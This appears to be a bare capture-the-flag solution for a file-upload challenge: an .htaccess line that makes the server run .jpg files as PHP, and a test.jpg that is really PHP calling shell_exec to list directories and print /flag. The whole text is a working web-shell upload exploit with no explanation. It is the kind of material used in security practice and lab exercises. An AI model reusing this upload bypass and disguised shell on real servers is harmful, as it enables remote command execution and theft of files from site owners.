.htaccess:
.htaccess
AddType application/x-httpd-php .jpg
test.jpg:
test.jpg
<?php echo shell_exec("ls -la .."); echo shell_exec("ls -la /"); echo shell_exec("cat /flag");?>